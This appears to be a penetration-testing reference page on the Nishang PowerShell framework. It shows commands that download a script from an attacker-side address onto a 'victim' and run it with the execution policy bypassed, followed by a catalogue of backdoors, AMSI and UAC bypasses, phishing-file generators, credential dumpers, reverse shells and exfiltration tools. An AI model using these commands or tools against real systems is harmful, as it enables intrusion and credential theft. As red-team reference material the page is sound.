Nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of pene
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
Link: https://github.com/samratashok/nishang
Also installed by default on Kali:
root@kali:~# ls -l /usr/share/nishang/
total 48
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Antak-WebShell
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Backdoors
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Escalation
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Execution
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Gather
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Misc
-rw-r--r-- 1 root root 495 Jun 4 11:14 nishang.psm1
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Pivot
drwxr-xr-x 2 root root 4096 Jun 4 11:15 powerpreter
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Prasadhak
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Scan
drwxr-xr-x 2 root root 4096 Jun 4 11:15 Utility We will need to upload the nishang scripts into the victim computer:
powershell iwr -uri 10.10.14.14/{Nishang script}
Load the script:
powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1
Scripts
Nishang currently contains the following scripts and payloads.
ActiveDirectory
Get-Unconstrained – Find computers in active directory which have Kerberos Unconstrained Delegation enabled.
Antak – the Webshell
Antak – Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
Backdoors
HTTP-Backdoor – A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
DNS_TXT_Pwnage – A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
Execute-OnTime – A backdoor which can execute PowerShell scripts at a given time on a target.
Gupt-Backdoor – A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
Add-ScrnSaveBackdoor – A backdoor which can use Windows screen saver for remote command and script execution.
Invoke-ADSBackdoor – A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
Add-RegBackdoor – A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
Set-RemoteWMI – Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
Set-RemotePSRemoting – Modify permissions of PowerShell remoting to allow access to a non-admin user.
Bypass
Invoke-AmsiBypass – Implementation of publicly known methods to bypass/avoid AMSI.
Client
Out-CHM – Create infected CHM files which can execute PowerShell commands and scripts.
Out-Word – Create Word files and infect existing ones to run PowerShell commands and scripts.
Out-Excel – Create Excel files and infect existing ones to run PowerShell commands and scripts.
Out-HTA – Create a HTA file which can be deployed on a web server and used in phishing campaigns.
Out-Java – Create signed JAR files which can be used with applets for script and command execution.
Out-Shortcut – Create shortcut files capable of executing PowerShell commands and scripts.
Out-WebQuery – Create IQY files for phishing credentials and SMB hashes.
Out-JS – Create JS files capable of executing PowerShell commands and scripts.
Out-SCT – Create SCT files capable of executing PowerShell commands and scripts.
Out-SCF – Create a SCF file which can be used for capturing NTLM hash challenges.
Escalation
Enable-DuplicateToken – When SYSTEM privileges are required.
Remove-Update – Introduce vulnerabilities by removing patches.
Invoke-PsUACme – Bypass UAC.
Execution
Download-Execute-PS – Download and execute a PowerShell script in memory.
Download_Execute – Download an executable in text format, convert it to an executable, and execute.
Execute-Command-MSSQL – Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
Execute-DNSTXT-Code – Execute shellcode in memory using DNS TXT queries.
Out-RundllCommand – Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.
Gather
Check-VM – Check for a virtual machine.
Copy-VSS – Copy the SAM file using Volume Shadow Copy Service.
Invoke-CredentialsPhish – Trick a user into giving credentials in plain text.
FireBuster FireListener – A pair of scripts for egress testing
Get-Information – Get juicy information from a target.
Get-LSASecret – Get LSA Secret from a target.
Get-PassHashes – Get password hashes from a target.
Get-WLAN-Keys – Get WLAN keys in plain text from a target.
Keylogger – Log keystrokes from a target.
Invoke-MimikatzWdigestDowngrade – Dump user passwords in plain on Windows 8.1 and Server 2012
Get-PassHints – Get password hints of Windows users from a target.
Show-TargetScreen – Connect back and Stream target screen using MJPEG.
Invoke-Mimikatz – Load mimikatz in memory. Updated and with some customisation.
Invoke-Mimikittenz – Extract juicy information from target process (like browsers) memory using regex.
Invoke-SSIDExfil – Exfiltrate information like user credentials, using WLAN SSID.
Invoke-SessionGopher – Identify admin jump-boxes and/or computers used to access Unix machines.
MITM
Invoke-Interceptor – A local HTTPS proxy for MITM attacks. =
Pivot
Create-MultipleSessions – Check credentials on multiple computers and create PSSessions.
Run-EXEonRemote  – Copy and execute an executable on multiple machines.
Invoke-NetworkRelay  – Create network relays between computers.
Prasadhak
Prasadhak – Check running hashes of running process against the VirusTotal database.
Scan
Brute-Force – Brute force FTP, Active Directory, MSSQL, and Sharepoint.
Port-Scan – A handy port scanner.
Powerpreter
Powerpreter – All the functionality of nishang in a single script module.
Shells
Invoke-PsGcat – Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
Invoke-PsGcatAgent – Execute commands and scripts sent by Invoke-PsGcat.
Invoke-PowerShellTcp – An interactive PowerShell reverse connect or bind shell
Invoke-PowerShellTcpOneLine – Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
Invoke-PowerShellTcpOneLineBind – Bind version of Invoke-PowerShellTcpOneLine.
Invoke-PowerShellUdp – An interactive PowerShell reverse connect or bind shell over UDP
Invoke-PowerShellUdpOneLine – Stripped down version of Invoke-PowerShellUdp.
Invoke-PoshRatHttps – Reverse interactive PowerShell over HTTPS.
Invoke-PoshRatHttp – Reverse interactive PowerShell over HTTP.
Remove-PoshRat – Clean the system after using Invoke-PoshRatHttps
Invoke-PowerShellWmi – Interactive PowerShell using WMI.
Invoke-PowerShellIcmp – An interactive PowerShell reverse shell over ICMP.
Invoke-JSRatRundll – An interactive PowerShell reverse shell over HTTP using rundll32.exe.
Invoke-JSRatRegsvr – An interactive PowerShell reverse shell over HTTP using regsvr32.exe.
Utility
Add-Exfiltration – Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
Add-Persistence – Add reboot persistence capability to a script.
Remove-Persistence – Remote persistence added by the Add-Persistence script.
Do-Exfiltration – Pipe (|) this to any script to exfiltrate the output.
Download – Transfer a file to the target.
Parse_Keys – Parse keys logged by the keylogger.
Invoke-Encode – Encode and compress a script or string.
Invoke-Decode – Decode and decompress a script or string from Invoke-Encode.
Start-CaptureServer – Run a web server which logs Basic authentication and SMB hashes.
ConvertTo-ROT13 – Encode a string to ROT13 or decode a ROT13 string.
Out-DnsTxt – Generate DNS TXT records which could be used with other scripts.
Last updated